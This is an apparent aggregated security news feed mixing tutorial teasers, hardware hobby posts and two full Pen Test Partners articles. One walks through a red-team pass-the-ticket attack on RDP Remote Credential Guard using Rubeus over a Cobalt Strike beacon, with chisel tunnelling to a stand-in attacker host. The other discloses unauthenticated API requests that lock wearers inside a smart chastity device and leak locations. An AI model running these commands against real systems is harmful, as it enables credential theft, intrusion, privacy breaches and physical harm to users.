wonder how to - null byteRetrieved title: Null Byte « WonderHowTo, 3 item(s)
As we've seen with other tools and utilities, administrators typically use certain things to do their job more efficiently, and those things are often abused by attackers for exploitation. After all, hacking is just the process of getting a computer to do things in unexpected ways. Today, we will be covering various methods to perform banner grabbing to learn more about the target system. Banner grabbing is a technique used to gather information about running services on a computer system. Banners refer to the messages on the host that usually provide a greeting or version information. An... more
One of the most exciting things as an ethical hacker, in my opinion, is catching a reverse shell. But often, these shells are limited, lacking the full power and functionality of a proper terminal. Certain things don't work in these environments, and they can be troublesome to work with. Luckily, with a few commands, we can upgrade to a fully interactive shell with all the bells and whistles. It can often be frustrating when working with reverse shells if all you have is a "dumb" shell. A dumb shell is a type of shell that doesn't have a proper terminal's full functionality. That means things... more
We're living in the age of Big Data. As the primary force behind everything from targeted marketing campaigns and online search algorithms to self-driving cars and even space exploration, massive sets of complex data stand at the heart of today's most exciting and important innovations. The Complete Big Data eBook & Video Course Bundle will act as your one-stop resource for learning how to harness this field's most powerful and relied-upon tools and platforms, and it's on sale today for 95% off at just $29.99. Whether you're interested in becoming a full-fledged data engineer or want to gain... more
the hackers newsRetrieved title: The Hacker News, 3 item(s)
Microsoft, in collaboration with MITRE, IBM, NVIDIA, and Bosch, has released a new open framework that aims to help security analysts detect, respond to, and remediate adversarial attacks against machine learning (ML) systems. Called the Adversarial ML Threat Matrix, the initiative is an attempt to organize the different techniques employed by malicious adversaries in subverting ML systems. Just
Attention readers, if you are using Google Chrome browser on your Windows, Mac, or Linux computers, you need to update your web browsing software immediately to the latest version Google released earlier today. Google released Chrome version 86.0.4240.111 today to patch several security high-severity issues, including a zero-day vulnerability that has been exploited in the wild by attackers to
Graphic for illustration Cybersecurity researchers on Tuesday disclosed details about an address bar spoofing vulnerability affecting multiple mobile browsers, such as Apple Safari and Opera Touch, leaving the door open for spear-phishing attacks and delivering malware. Other impacted browsers include UCWeb, Yandex Browser, Bolt Browser, and RITS Browser. The flaws were discovered by Pakistani
hackadayRetrieved title: Hackaday, 3 item(s)
Here’s a neat little trick: take the jaggies out of scaled fonts on the fly! This technique is for use on graphic displays where you might want to scale your fonts up. Normally you’d just write a 2×2 block of pixels for every area where there would have been one pixel and boom, larger font. Problem is, that also multiplies each empty area and you end up with jagged edges in the transitions that really catch your eye.
[David Johnson-Davies] entered big-brain mode and did something much cleverer than the obvious solution of using multiple font files. Turns out if you analyze the smoothing problem you’ll realize that it’s only the angled areas that are to blame, horizontal and vertical scaling are nice and smooth. [David’s] fix looks for checker patterns in what’s being drawn, adding a single pixel in the blank spots to smooth out the edge incredibly well!
The technique has been packaged up in a simple function that [David] wrote to play nicely in the Arduino ecosystem. However, the routine is straightforward and would be quick to implement no matter the language or controller. Keep this one in your back pocket!
Now if all you have on hand is an HD44780 character LCD, that one’s arguably even more fun to hack around on just because you’re so limited on going beyond the hard-coded font set. We’ve seen amazing things like using the custom character slots to play Tetris.
The human body does plenty of cool tricks, but one of the easiest to take advantage of is persistence of vision (POV). Our eyes continue to see light for a fraction of a second after the light goes off, and we can leverage this into fun blinkenlight toys like POV staffs. Sure, you can buy POV staffs and other devices, but they’re pretty expensive and you won’t learn anything that way. Building something yourself is often the more expensive route, but that’s not the case with [shurik179]’s excellent open-source POV staff.
There’s a lot to like about this project, starting with the detailed instructions. It’s based on the ItsyBitsyM4 Express and Adafruit’s Dotstar LED strips. You could use the Bluetooth version, but it’s already quite easy to load images to the staff because it shows up as a USB mass storage device. We like that [shurik179] added an IMU and coded the staff so that the images look consistent no matter how fast the staff is spinning. In the future, [shurik179] might make a Bluetooth version that’s collapsible. That sounds like quite the feat, and we can’t wait to see it in action.
As cool as it is to wave a POV staff around, there’s no real practical application. What’s more practical than a clock?
In what can only be described as a work of art, [suedbunker] has created a clock under a glass dome. Sporting Nixie tubes, a DS3223, BCD encoders, and MPSA43 transistors driven by an MCP23008 I/O expander it is truly a sight to behold. [suedbunker] has previously created the Circus Clock, a similar clock that celebrated a diversity of ways of displaying the time.
The dome clock represents a continuation of that idea. Reading the clock requires looking at the horizontal and vertical numbers separately. The hours are on the horizontal and minutes are on the vertical. Monday to Sunday is represented in the neon bulbs on the back. The power supply at the bottom provides a wide range of voltages including 5 V, 12 V, 24 V, 45 V, 90 V, 150 V, and -270 V for all the various types of lights. For safety, an optocoupler is used on the -270 volts to drive the clear seven-segment display.
An Arduino Nano controls the whole clock by communicating with the DS3223 real-time clock module and the port expanders via I2C. The soldering and wiring work, in particular, is tidy and beautiful. We look forward to future clocks by [suedbunker] and his wife.
pen test partnersRetrieved title: Pen Test Partners, 3 item(s)
- Microsoft’s Remote Credential Guard (RCG) for RDP protects creds if an RDP server is compromised.
- It leaves little scope for password or NTLM credential dumping when a user connects to the server.
- It does however introduce workstation attack vectors.
- Abusing a user’s Kerberos token allows Pass-The-Ticket (PTT) attacks and authenticate to RDP servers without credentials.
- PTT attacks are nothing new, but there are no offensive RDP tool supports RCG (that I know of).
- We have to resort to using the built in Terminal Services Client and a few tricks to allow Kerberos to fully function from a remote non-domain joined machine.
Historically, attacks on RDP using Pass-The-Hash and Pass-The-Ticket techniques have not been possible. Typically, Windows performed an interactive logon when connecting to RDP, therefore valid credentials were always required to perform such logins.
Then came Network Level Authentication (NLA) which was introduced in RDP 6.0 around the time Windows Vista was released. The purpose of NLA is to ensure an authenticated session occurs prior to allocating remote desktop resources and showing the Windows Logon screen. Why waste server resources and expose potential attack vectors prior to authentication. But even through the introduction of NLA, PTH and PTT techniques were still not possible.
Whilst NLA can perform both NTLM and Kerberos authentication, this is only the first phase to satisfy the NLA portion of the protocol. The CredSSP provider used by NLA still required a form of valid credentials within a structure called TSCredentials. Prior to Windows 10, version 1607 and Windows Server 2016, this structure would only permit password or smartcard based credentials.
Remote Credential Guard
Then came along Remote Credential Guard (RCG) and Restricted Admin mode. Both allow the second phase to use NTLM/Kerberos for authentication by introducing another type of credentials called TSRemoteGuardCreds. Well, that’s not entirely correct, restricted admin mode will happily accept an empty TSPasswordsCreds structure which will be duly ignored by the server when connecting using restricted admin mode. I won’t go into too much detail on this since @SteveSyfuhs will do a much better job with his How Authentication works when you use Remote Desktop article.
CyberArk also wrote an article called “No more Pass-the-Hash” – Exploring the limitations of Remote Credential Guard. Is essence, if a server is compromised that is remotely administered using RCG, then no credentials are ever exchanged with the remote desktop host, significantly reducing the chance of credential compromise. The TGT ticket imported into the cache on server is also of no use outside of the RDP host either, since it has been delegated to the client machine, as CyberArk explain in their article. What CyberArk don’t mention though is a primary TGT.
If you can obtain a primary TGT along with its session key, for example one that is produced on a domain joined interactive logon session, then you can use this to authenticate to remote RDP servers with RCG enabled. Better still, all this can be done without requiring elevated permissions.
Microsoft Diagram of RCG features.
RCG is quite complex, once you have authenticated to the RDP server, a channel is created between the server and the client to allow Kerberos service tickets to be requested from the client on behalf of the RDP server. After an RDP connection is established with the server, if any additional Kerberos network services are requested within the session, the RCG channel is used for this purpose. I am yet to find any RDP client that is commonly used for offensive purposes that supports RCG. FreeRDP allows the use of /pth, but this will enforce restricted admin mode, preventing any further access beyond the RDP host itself.
Killer Combo: Rubeus, Proxifer and Terminal Service Client
So how can we utilise PTT attacks using the only tool that I know of that supports RCG, Windows Terminal Services Client?
There are a few things that Terminal Services Client needs to function in RCG mode. In addition to the obvious RDP port access, the client also requires functional AD DNS and access to the Kerberos KDC. This is generally a lot easier when the attacking machine is connected (but not joined) to the same network as AD. But when performing a red team, seldom do we have access to such a node without raising too many alarms. Generally, we must hop though a proxy or two to get at our targets from our own box whilst staying under the radar.
In the scenario below I will assume that a Cobalt Strike or similar implant is active on a compromised domain joined workstation.
The first stage is to setup Terminal Services Client to pivot through a SOCKS proxy into the victims Active Directory domain. You need a capable SOCKS proxy if you intend on bouncing around to different RDP targets within the AD domain. I tend to use chisel for this purpose.
Typically, the chisel server is setup on a public domain somewhere, accessible from the victims Active Directory network. Starting the server in a simple HTTP mode on 8080 is as easy as:
chisel server -reverse -socks5
The reverse and socks5 options allow the client to specify reverse proxy and SOCKS5 rules to permit incoming SOCKS into the victim Active Directory network.
Once chisel server is up and running, we need to connect to it from the compromised host to open a route into the AD network. This would usually be done over the C2 channel
chisel client http://chisel.evilhost.com:8080 R:3128:socks R:88:dc1.hacklab.local:88/udp R:88:dc1.hacklab.local:88
The client will request 3 reverse port forwards, the first is a SOCKS5 capable port that will be listening on port 3128 and the other maps port 88 TCP and UDP to the KDC (DC) host within the Active Directory network. Unfortunately, Proxifier didn’t seem to use the SOCKS5 port when accessing the KDC, hence the need for direct mappings for port 88.
For those that have not used Proxifier before, it is essentially proxychains for Windows. The great thing with Proxifer is that there is no need to prefix the app that requires filtering. You build the rules inside the Proxifer GUI and it will automatically apply the redirection and forward to your SOCKS proxy if the rules match. I’d recommend you do all this from a VM. Installing Proxifer seems to break WSL2 due to the use of Winsock LSP’s.
First things first, setup the Name Resolution settings like below:
Proxifer will intercept all DNS queries on the host and if any match the domain hacklab.local, the resolution will be performed over the configured SOCKS proxies.
Next, we setup the proxy servers required to pivot into the victim AD network. You will notice the use of localhost here as this is where I setup chisel within the lab scenario, but this would be the address of your chisel server along with the port specified for reverse SOCKS into the AD network.
And finally, we create a Proxification rule to ensure that the mstsc.exe program will use the SOCKS proxy for communication to the target host.
As mentioned earlier, I also added lsass.exe to this rule to automatically attempt to get Kerberos pushed down the SOCKS proxy, but unfortunately for whatever reason this didn’t work. Even forcing TCP on the KDC realm (see below) did not work.
With Proxifer setup this way, all DNS queries for hacklab.local will be resolved using the SOCKS proxy and any connections to hacklab.local from mstsc.exe will also go via the SOCKS proxy. This is essence allows AD DNS to function, and access to the RDP host we would like to pivot to in one go.
Manually Adding the Kerberos Realm
Many off domain techniques that use Kerberos tickets to authenticate to a remote service only really need the TGS in question, for example CIFS or LDAP. This will generally forego the need to communicate with the KDC. RCG is a little different, the machine seems to need access to the TGT and not the TERMSRV TGS.
I imagine that the reason for this is due to the channel I mentioned earlier. Not only does the client request the TERMSRV TGS before connecting, it will also request any other service tickets on behalf of the target RDP host when requested. Now this can be a problem when your machine is not joined to AD. LSA will notice that the TGT is present within the users Kerberos cache but will struggle to find a valid KDC to request further service tickets.
On a domain joined machine it will look up the Kerberos SRV record based on the domain name the machine is joined to. Since we are not joined to the domain, the client will fail to resolve the KDC and attempt to fall back on NTLM, triggering a credential dialog when connecting to the RDP target. We can work around this issue by manually registering a Kerberos realm within Windows from the attacking host machine.
ksetup /addkdc HACKLAB.LOCAL chisel.evilhost.com ksetup /setrealmflags HACKLAB.LOCAL tcpsupported
Once you have done this, a reboot is required for LSA to refresh the fixed realms now configured within the registry. The idea here is to inform LSA that it can find the KDC for HACKLAB.LOCAL via the chisel server. Since we have mapped both TCP and UDP port 88 into the AD network, this will permit LSA to request further tickets via the chisel proxy into the Active Directory network via the compromised host.
Obtaining the TGT
Unlike NTLM hashes, we don’t need elevated privileges to obtain a TGT that can be used for PTT. Typically, TGT’s are also locked away within LSASS just like NTLM hashes are. Partial TGT info can be requested from user mode but key information is missing that is only stored inside LSASS.
Using a trick that @gentilkiwi and co found, you can fill in these blanks with delegation tickets. @Harmj0y does a great job explaining how this works in his Rubeus – Now With More Kekeo blog post whilst he was adding the tgtdeleg feature to Rubeus. We can request the current users TGT like this over a CS beacon implant on the compromised host:
beacon> execute-assembly C:\tools\Rubeus.exe tgtdeleg /nowrap [*] Tasked beacon to run .NET program: Rubeus.exe tgtdeleg /nowrap [+] host called home, sent: 356939 bytes [+] received output: ______ _ (_____ \ | | _____) )_ _| |__ _____ _ _ ___ | __ /| | | | _ \| ___ | | | |/___) | | \ \| |_| | |_) ) ____| |_| |___ | |_| |_|____/|____/|_____)____/(___/ v1.5.0 [*] Action: Request Fake Delegation TGT (current user) [*] No target SPN specified, attempting to build 'cifs/dc.domain.com' [*] Initializing Kerberos GSS-API w/ fake delegation for target 'cifs/dc1.hacklab.local' [+] Kerberos GSS-API initialization success! [+] Delegation requset success! AP-REQ delegation ticket is now in GSS-API output. [*] Found the AP-REQ delegation ticket in the GSS-API output. [*] Authenticator etype: aes256_cts_hmac_sha1 [*] Extracted the service ticket session key from the ticket cache: HXscMHx0OckqQHg2ijyLdd8gbSr0H3jik/HbZ/LfpW8= [+] Successfully decrypted the authenticator [*] base64(ticket.kirbi): doIFjjCCBYqgAwIBBaEDAgEWooIEZzCCBGNhggRfMIIEW6ADAgEFoQ8bDUhBQ0tMQUIuTE9DQUyiIjAgoAMCAQ……….FDS0xBQi5MT0NBTKkiMCCgAwIBAqEZMBcbBmtyYnRndBsNSEFDS0xBQi5MT0NBTA==
Importing TGT Into the Attacking Windows Host
Once you have dumped the users TGT over your C2 channel you can then import this into your attacking windows machine. Again, Rubeus can be used for this. Running the following from an elevated command prompt will import the TGT that was stolen in the previous step.
Rubeus.exe ptt /ticket:doIFjjCCBYqgAw………i5MT0NBTA== ______ _ (_____ \ | | _____) )_ _| |__ _____ _ _ ___ | __ /| | | | _ \| ___ | | | |/___) | | \ \| |_| | |_) ) ____| |_| |___ | |_| |_|____/|____/|_____)____/(___/ v1.5.0 [*] Action: Import Ticket [+] Ticket successfully imported! Issuing a klist command should confirm the imported TGT into the current session: klist Current LogonId is 0:0x15cf57 Cached Tickets: (1)
#0> Client: Administrator @ HACKLAB.LOCAL Server: krbtgt/HACKLAB.LOCAL @ HACKLAB.LOCAL KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96 Ticket Flags 0x60a10000 -> forwardable forwarded renewable pre_authent name_canonicalize Start Time: 10/19/2020 15:20:43 (local) End Time: 10/20/2020 1:20:07 (local) Renew Time: 10/26/2020 15:20:07 (local) Session Key Type: AES-256-CTS-HMAC-SHA1-96 Cache Flags: 0x1 -> PRIMARY Kdc Called:
One thing to note here, if you have other Kerberos tickets not belonging to the victim domain then you are likely domain joined yourself, in which case you should start a clean session without any Kerberos tickets available. This can be achieved using Rubeus createnetonly or runas /netonly command prior to importing the ticket.
Pivoting to the Host
The last step of the attack is to simply invoke mstsc.exe from the session we imported the TGT into in the previous step and with the correct arguments to utilise RCG. The client will be forced through Proxifer for AD DNS lookups and RDP. LSA will use the chisel server’s port 88 directly for additional Kerberos tickets that need resolving for HACKLAB.LOCAL.
mstsc /remoteGuard /v:dc1.hacklab.local
If everything worked correctly you should be greeted with the desktop of your new compromised host.
You should also be able to see the additional TERMSRV TGS from the attacking host machine that mstsc.exe would have requested during connection.
klist Current LogonId is 0:0x15cf57 Cached Tickets: (2) #0> Client: Administrator @ HACKLAB.LOCAL Server: krbtgt/HACKLAB.LOCAL @ HACKLAB.LOCAL KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96 Ticket Flags 0x60a10000 -> forwardable forwarded renewable pre_authent name_canonicalize Start Time: 10/19/2020 22:04:22 (local) End Time: 10/20/2020 8:04:22 (local) Renew Time: 10/26/2020 22:04:22 (local) Session Key Type: AES-256-CTS-HMAC-SHA1-96 Cache Flags: 0x1 -> PRIMARY Kdc Called: #1> Client: Administrator @ HACKLAB.LOCAL Server: TERMSRV/dc1.hacklab.local @ HACKLAB.LOCAL KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96 Ticket Flags 0x60a50000 -> forwardable forwarded renewable pre_authent ok_as_delegate name_canonicalize Start Time: 10/19/2020 22:08:04 (local) End Time: 10/20/2020 8:04:22 (local) Renew Time: 10/26/2020 22:04:22 (local) Session Key Type: AES-256-CTS-HMAC-SHA1-96 Cache Flags: 0 Kdc Called: dc1.hacklab.local
Remote Credential Guard is an excellent feature for protecting credentials when connecting to a compromised server. Since no credentials are exchanged and the TGT is not exportable for abuse, it protects the high privilege accounts connecting to servers protected by RCG.
Of course, if you flip the compromise on its head and end up on a workstation, you may find yourself vulnerable to this kind of attack. If a user that has rights to connect to RDP hosts and RCG is enabled within the AD network, then you no longer need to compromise any account passwords to connect to the RDP hosts, you simply swipe the TGT and Pass-The-Ticket.
The post Abusing RDP's Remote Credential Guard with Rubeus PTT first appeared on Pen Test Partners.
October is Cyber Security Month, when organisations like the CISA, the ECSM, and many more promote initiatives to help raise security awareness. Around the world companies are dedicating time to improve staff security awareness, and it’s a really busy time for us.
You may be thinking you’d like to do something but are stuck with ideas to run. Below I have listed a few ideas that I have seen to work really well at engaging staff and helping change culture.
Posters are an old stalwart. They can be successful but need to be kept fresh and be eye catching. The message needs to be simple, the visuals strong and amusing. Key messages could be:
- Use a password manager
- What’s on that USB you plugged in?
- Oversharing on Social Media again?
- Turn on Two-Factor Authentication
- Lock your workstation
- Think before you click
You could also include some key policy messages here, but don’t overdo it. Remember, it needs to be interesting. Telling your staff on a poster why you use AES-256 encryption is dull!
Engage with your marketing teams or external designers to help you out too. Not only can they make the designs look good, but they can keep the wording appropriate to the whole company. Put posters everywhere, in lifts, on doors, in toilets, in staff rooms- anywhere staff will see them. You could even use digital signposts or screens for these messages.
Security tip of the week/month
This is a great way of keeping the message current. Each week or month send out a different tip. There are many ways to do this- email, Teams/Slack, posters, banners on intranet pages, whatever works best your organisation.
The tips could be as simple as how to use a password manager or how two factor authentication can work. I would talk about personal and home security issues as well as work ones. This will help endear your staff to your messages. If you share home security advice they are more likely to do it as they can see the value to them personally.
Security branded ‘stuff’
Another way to help keep security messaging in people’s thoughts is to give away nice branded items,
Some things I have found work well, branded paper cups use in your onsite café, you can get 1000’s for less than £50. USB blockers, a great way to tie in to USB security. Fidget cubes, the modern day ‘stress ball’. Socks. We give our own socks away, they are a fun way of getting interaction. I’d avoid tacky mouse mats, pens and dull stuff you wouldn’t even bother picking up at a conference or trade event.
There are so many innovative gifts these days, from facemasks to water bottles, to notepads and card blockers. Almost anything can be branded with your key messages.
Security stall with games
Set up a virtual stand, be that in a channel on Teams or Slack, and allow people to ask you any questions. You could also tie in to your branded items by rewarding those who ask questions or perhaps those who send you an example of a phishing email.
Anyone who sends you a phishing email gets something, you’ll have loads in a few days and staff will be on the lookout for more. You could even do something like a loyalty scheme with gifts- after the 6th phishing email they win a free coffee for example.
Security champion program
A security champion is someone who works in key departments and is your security eyes and ears. It can be as simple as them just helping field questions or as high a level as having local password reset ability. It is a great way of empowering departments to provide localised help and take the weight off you. These people could be rewarded with dinners or tech.
You could take this further and set up full virtual security champion teams. When lockdown restrictions are eased and lifted you could provide an away day, complete with lunch to brainstorm ideas for the next Cyber Security Month. I’ve spoken as an external speaker at a number of days like these, giving a different perspective and providing some external view of the risk.
You could send regular security stats out each week or month. This is not an opportunity for you to blow your own trumpet about how amazing the security tools you put in are, it’s to focus on the things that end users alerted you to. “We had 27 phishing emails alerted to us this month, everyone got a pair of socks, two people got their coffee free for a week” etc.
You could also talk about any breaches you may have had. Do not name names though. Focus on how you found the breaches and how the response was carried out. This is a great way to provide insight in to what you do and give relevance to your budget spends.
Like all good things, getting senior staff buy-in is key to any successful security awareness program. Get your CEO to email the whole company. This may take a little persuasion and possibly a little upward management and of course time so plan early.
It is so important to educate then test your staff, this can give some basic metrics. However, do not see these metrics as a way of demonstrating the value of your program.
Phishing stats are a fickle thing, one month you could have really positive results and the next really poor. Does that mean that your program has failed? Not always. Sometimes your phishes hit their mark, it’s just an opportunity to keep that message going and keep training.
It is excellent practice to vary your phishing style and targets each month. This can help you identify trends and individuals who may need more help and training.
Securing home computers/devices or family
Providing help and guidance on how to secure home devices and computers is a great way to engage your staff. Your security champions can help here as can your security stall. You can also provide downloadable tips and tricks people can take home to secure their own home network.
You need to be mindful that many staff won’t be technical so keep it simple. Showing how to set up parental controls or how to securely configure social media for example can be useful as there are many options.
Security focused lunch-and-learn talks
At PTP we have a lunch-and-learn every Friday- PTP TeaSides. The content is diverse- previews of conference talks, blacksmithing, origami, home brew beer and mead, first aid for children. You could set up your own lunch and learn sessions focused on security, perhaps once a month talk about how to do certain things.
Your home security guidance could be one of the topics, you could also show how to use the email security tools you have in place or do a talk on phishing. There is so much choice and this will really help engage. If you find people struggle to attend, a common tactic is to provide lunch, now with home working that won’t work, but when staff are in the office providing a few sandwiches while you talk about security will surely get an audience.
Overall I have found the best engagement messages are the ones that focus less on what you can and cannot do at work, but more on how staff can help fix things themselves, this helps change culture.
A successful campaign is about moving from it being a security awareness campaign to it being a security culture change. When you staff have a culture of security awareness they are much more switched on to the risks you are trying to prevent and much more likely to spot something that is not right and champion security through the business.
This takes time and effort, the things you do in Cyber Security Month you need to be doing all year long. Much like patching your servers, you don’t do that that once a year, you do it constantly. A security culture is the same, you have to keep the message going throughout the year.
Good luck and if we can help you kick your program off reach out and we will happily help.
- Smart Bluetooth male chastity lock, designed for user to give remote control to a trusted 3rd party using mobile app/API
- Multiple API flaws meant anyone could remotely lock all devices and prevent users from releasing themselves
- Removal then requires an angle grinder or similar, used in close proximity to delicate and sensitive areas
- Precise user location data also leaked by API, including personal information and private chats
- Vendor initially responsive, then missed three remediation deadlines they set themselves over a 6 month period
- Then finally refused to interact any further, even though majority of issues were resolved in migration to v2 API, yet API v1 inexcusably left available
This post is published in coordination with Internet of Dongs.
Smart adult toys and us
We haven’t written about smart adult toys in a long time, but the Qiui Cellmate chastity cage was simply too interesting to pass by. We were tipped off about the adult chastity device, designed to lock-up the wearer’s appendage.
There are other male chastity devices available but this is a Bluetooth (BLE) enabled lock and clamp type mechanism with a companion mobile app. The idea is that the wearer can give control of the lock to someone else.
We are not in the business of kink shaming. People should be able to use these devices safely and securely without the risk of sensitive personal data being leaked.
The security of the teledildonics field is interesting in its own right. It’s worth noting that sales of smart adult toys has risen significantly during the recent lockdown.
What is the risk to users?
We discovered that remote attackers could prevent the Bluetooth lock from being opened, permanently locking the user in the device. There is no physical unlock. The tube is locked onto a ring worn around the base of the genitals, making things inaccessible. An angle grinder or other suitable heavy tool would be required to cut the wearer free.
Location, plaintext password and other personal data was also leaked, without need for authentication, by the API.
We had particular problems during the disclosure process, as we would usually ask the vendor to take down a leaky API whilst remediation was being implemented. However, anyone currently using the device when the API was taken offline would also be permanently locked in!
As you will see in the disclosure timeline at the bottom of this post, some issues were remediated but others were not, and the vendor simply stopped replying to us, journalists, and retailers. Given the trivial nature of finding some of these issues, and that the company is working on another device that poses even greater potential physical harm (an “internal” chastity device), we have felt compelled to publish these findings at this point.
We have redacted significant details here.
We found a serious privacy vulnerability very quickly with the mobile app: all API endpoints were unauthenticated using only a long-ish “memberCode” to make requests. The memberCode itself is somewhat deterministic and is based on the date a user signed up for the service, however we found an even easier way using a shorter “friend code”.
A request with this six digit “friend” code returned a huge amount of information about that user, including very sensitive information such as their name, phone number, birthday, the exact co-ordinates where the app was opened, their longer “memberCode” value, and the user’s plaintext password (not that we need it).
It wouldn’t take an attacker more than a couple of days to exfiltrate the entire user database and use it for blackmail or phishing.
Numbers and leaked location data
We were able to sample a few IDs at random, showing user locations at the time of app registrations. Bear in mind this is just a small subset of users from the available data. We threw away any personal information immediately.
memberCode data = DoS for the user
Now we have the longer memberCode we can fetch all the devices associated with that person:
GET /list?memberCode=20200409xxxxxxxx HTTP/1.1 Host: qiuitoy.com Connection: close "deviceId": 0, "deviceCode": "201909xxxxxxxxxx", "deviceName": "Cellmatexxxx", "deviceNick": "Cellmatexxxx", "deviceNumber": "QIUIxxxxxxxxx", "deviceType": 2, "deviceBlue": null, "deviceBlueAddr": "F9:34:02:XX:XX:XX", "isEncrypt": 1,
And once we have that, we can work out what permissions that person has over that lock (so can they unlock it themselves or have to ask someone else):
GET /wear?memberCode=20200409xxxxxxx&deviceCode=20191204xxxxxx HTTP/1.1 Host: qiuitoy.com
And if they can, we can flip that so they’re now locked out of the device:
POST /binding HTTP/1.1 Host: qiuitoy.com Connection: close memberName=Pwned&memberCode=20200409xxxxxx&deviceCode=20191204xxxxxx
And we can do that to everyone, very quickly, locking everyone in, or out. There is no emergency override function either, so if you’re locked in there’s no way out. This may or may not be considered a feature!
The BLE implementation itself requires an API request to generate an unlock command based on a token previously written to the lock. It’s possible we could analyse the requests and responses to generate the right key, or reverse engineer the lock hardware itself…
The above is taken from the decompiled Android app and by hooking it with Frida we can see the notifies (36f6) and writes (36f5) associated with checking the battery level first and then the unlock (the third write):
[+] BluetoothGattCallback constructor called from com.apicloud.uzble.AndroidBle$2 [BLE Write =>] UUID: 000036f5-0000-1000-8000-00805f9b34fb data: 0x56f3430769ddd6e1603xxx [BLE Notify <=] UUID: 000036f6-0000-1000-8000-00805f9b34fb data: 0xe01012b3074d111c98bxxx [BLE Write =>] UUID: 000036f5-0000-1000-8000-00805f9b34fb data: 0x25f8a92325fd9cfc7ea79xxx [BLE Notify <=] UUID: 000036f6-0000-1000-8000-00805f9b34fb data: 0x2717dd996ab4a017a6ceexxx [BLE Write =>] UUID: 000036f5-0000-1000-8000-00805f9b34fb data: 0x9ee90373a2d3f156b3557xxx [BLE Notify <=] UUID: 000036f6-0000-1000-8000-00805f9b34fb data: 0xbcdaea06fa1cb94f3f1c2596xxx [BLE Write =>] UUID: 000036f5-0000-1000-8000-00805f9b34fb data: 0x9ee90373a2d3f156b3557d52xxxx [BLE Notify <=] UUID: 000036f6-0000-1000-8000-00805f9b34fb data: 0xc04dab04c54c818d808a78c79adef839
But wait, that hex from the Android app, and the BLE characteristics look awfully familiar. It’s exactly the same implementation as the Nokelock we looked at, except the advertised device name is “OKGSS101”.
The per lock AES encryption key is returned in the API call listing the devices we made earlier. Mass unlocking over BLE anyone?
Locked in? Here’s a workaround
If you find yourself locked in, you’re probably wondering how you can get out without heavy tools or a visit to the emergency room…
The design of the locking pin uses a motor to withdraw it and is unfortunately not ferrous, so no easy use of magnets, nor is “bumping” it open (as you’ll be wearing it). I had a little success with a shim made from a cut-up can, but the idea of sharp pointy metal near anything important isn’t ideal.
The “better” alternative is to prise open the circuit board area where the front button and light is:
It’s glued-in but came out without much effort or damage. 3 volts (two AA batteries) applied to the white and yellow wires is enough to drive the unlock motor directly (white = negative, yellow = positive), a technique known as “spiking”.
Your local emergency department will probably have the right tools to cut though the metal safely though and would be your better first port of call!
For a realistic threat, the risk of personal data leakage seems more likely to be exploited and give reward to an attacker.
A number of countries have oppressive laws that may expose users of these types of devices to unwarranted interest from law enforcement and bigots.
Further, users are likely to want to keep their private lives private. They should expect privacy by default and security by design. If one wants to share very private information, then that should be by explicit intent of the user.
Many adult toy vendors have shown almost complete disregard for privacy and security over recent years. Fortunately, projects such as the Internet of Dongs have helped guide many towards improved security. Clearly Qiui hadn’t got the message.
Disclosure wasn’t as seamless as we might have initially hoped:
April 20th 2020: we messaged them asking who to report the issue to. They replied very quickly. Cool!
No problem, so we tried again without PGP:
So we sent them the details. Silence reigned.
May 26th 2020: we pushed a little harder, they responded, stating that they would fix by 6th June.
11/06/2020: an updated version was deployed to the App & Play Stores. This mostly resolved issues with requests now being forced to authenticate. Older API endpoints were left up though, and new APIs still returned exact user locations.
June 17th 2020: we sent a message detailing the residual problems, with no response.
June 25th 2020: we reached out again, via a journalist, Qiui said they didn’t want to fix (or couldn’t) as they “only” had $50,000.
June 30th 2020: we sent a follow up email (and twitter DM) with potential fixes to the remaining problems (and had it translated into Chinese just in case), with no response.
July 10th 2020: we contacted two UK retailers of the device to make them aware of the issues. One withdrew it from sale, and made contact with the EU-based wholesalers. Qiui responded back to the retailers that the remaining issues would be fixed “in August”.
September 11th 2020: RenderMan from @InternetOfDongs got in touch with us too: he had helped another researcher through the disclosure process with Qiui. @MikeTsenatek had found a password reset issue independently and was also struggling to get heard by the vendor. By chance he noticed a tweet of mine some time ago, figured that we might be looking at this device and reached out.
We had a great call together where we exchanged remarkably similar experiences of interactions with Qiui! His write-up is available here.
This reinforced our decision to publish: clearly others were likely to find these issues independent of us, so the public interest case was made in our minds.
RenderMan definitely deserves kudos for his continued efforts to broker conversations between researchers and vendors in the adult toy arena. Some vendors have made significant improvements to their product security and privacy as a result of his hard work.
October 4th 2020: We were contacted by a third researcher with similar concerns.
October 6th 2020: We published in coordination with the other parties.
infosec writersRetrieved title: InfoSecWriters.com, 3 item(s)
Contributed by Kevin Thompson
Over the five years my organization has pursued becoming more organized in their information security program. To develop an effective program, the organization must start with the basics. Identify and categorize all company assets to effectively apply desired controls later in this process. Next, you must identify reoccurring maintenance windows and communicate with the asset owners to ensure maintenance awareness. Identify and configure security applications that will apply remediations. Identify and decommission all stale assets to eliminate unnecessary risk in the environment. Once all the previously mentioned steps are complete the security management program is at the beginning stages to become an effective tool to lower risk in the environment.
This document is in PDF format. To view it click here.
Contributed by Adam Yarborough
Secrets management is an aspect of information security management needed for organizations of all sizes. Small organizations may leave all the important passwords in the control of the owner, where larger organizations may have multiple teams dedicated to different facets of information security. This paper will inspect the creation and adoption of specialized roles in information security management with a focus on secrets management. There are commonalities shared between the carefully guarded recipes of a family restaurant, the intellectual property holdings of startups looking for acquisition, and classified credentials protected by nation states. Associated with those commonalities are roles and their positions in the organization structure that were created to protect confidentiality, integrity, and availability. A person may be able to easily remember a single password, like for a website, but maintaining multiple unique passwords across many sites will soon lead to either password re-use or lost credentials. The same happens with organizations of all sizes
This document is in PDF format. To view it click here.
Contributed by David Brehmer
Transformational technologies can change the information technology landscape at a high level. These technologies are known as disruptive. One of the fastest growing emerging technologies is the Internet of Things, or IoT. While IoT devices have existed for over 20 years, the last decade has seen a substantial shift in the impact of these devices on the world. From smart watches being able to detect atrial fibrillation to self-driving cars, IoT devices have changed human interaction with computing devices. This emerging technology has ushered in a change so dramatic that our lives will change in ways we have yet to comprehend. This study will investigate the history of IoT and explore the ways this disruptive technology will forever alter humanity.
This document is in PDF format. To view it click here.
security weekRetrieved title: SecurityWeek RSS Feed, 3 item(s)
A ransomware attack that hobbled a Georgia county government in early October reportedly disabled a database used to verify voter signatures in the authentication of absentee ballots.
Microsoft and MITRE, in collaboration with a dozen other organizations, have developed a framework designed to help identify, respond to, and remediate attacks targeting machine learning (ML) systems.
